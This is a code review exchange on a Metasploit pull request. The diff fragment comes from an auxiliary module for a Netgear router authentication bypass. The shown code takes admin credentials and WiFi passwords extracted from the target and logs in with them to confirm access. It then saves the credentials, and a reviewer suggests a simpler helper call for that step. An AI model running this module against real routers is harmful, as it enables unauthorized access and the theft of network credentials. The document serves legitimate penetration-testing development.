modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb

```diff
@@ -0,0 +1,269 @@
+    end
+
+    if username.empty? || password.empty?
+      fail_with(Failure::UnexpectedReply, 'Application responded with expected content, but the matched content was an empty string for some reason!')
+    end
+
+    print_good("Can log into target router using username #{username} and password #{password}")
+
+    if wifi_ssid_5g.empty? || wifi_password_5g.empty?
+      print_warning('5G SSID information contained blank strings, information might be invalid!')
+    end
+
+    if wifi_ssid.empty? || wifi_password.empty?
+      print_warning('5G SSID information contained blank strings, information might be invalid!')
+    end
+
+    print_status('Attempting to retrieve /top.html to verify we are logged in!')
+
+    print_status('Sending one request to grab authorization cookie from headers...')
+    cookie_jar.clear
+    res = send_request_cgi(
+      'uri' => '/top.html',
+      'method' => 'GET',
+      'keep_cookies' => 'true'
+    )
+
+    if res.nil?
+      fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
+    end
+
+    if cookie_jar.empty?
+      fail_with(Failure::UnexpectedReply, "Router didn't respond with the expected Set-Cookie header to a response to /top.html!")
+    end
+
+    print_status('Got the authentication cookie, associating it with a logged in session...')
+    res = send_request_cgi(
+      'uri' => '/top.html',
+      'method' => 'GET',
+      'authorization' => basic_auth(username, password)
+    )
+
+    if res.nil?
+      fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
+    end
+
+    result = res.get_html_document
+    unless result.xpath("//div[@id='firm_version']/text()") # Find all div tags with an "id" attribute named "firm_version" and find its text value.
+      fail_with(Failure::UnexpectedReply, 'The target router did not respond with a firmware version when /top.html was requested. Are we logged in?')
+    end
+
+    print_good('Successfully logged into target router using the stolen credentials!')
+    print_status('Attempting to store credentials for future use...')
+
+    # Create HTTP Login Data
+    service_data = {
+      address: datastore['RHOST'],
+      port: datastore['RPORT'],
+      service_name: 'http',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      origin_type: :service,
+      private_data: password,
+      private_type: :password,
+      username: username
+    }
+
+    credential_data.merge!(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL
+    }.merge(service_data)
+
+    create_credential_login(login_data)
```

Comment:
This can all be reduced  to a single helper call.
```suggestion
    # Create HTTP Login Data
    store_valid_credential(user: username, private: password, private_type: :password)
```

Reply:
Thanks for the callout, this makes this a lot simpler :) Fixed in https://github.com/rapid7/metasploit-framework/pull/15677/commits/061240367d623001de05ac420acf6b4a50707424 and used the suggestions from our call to support adding in WiFi credentials as well 😄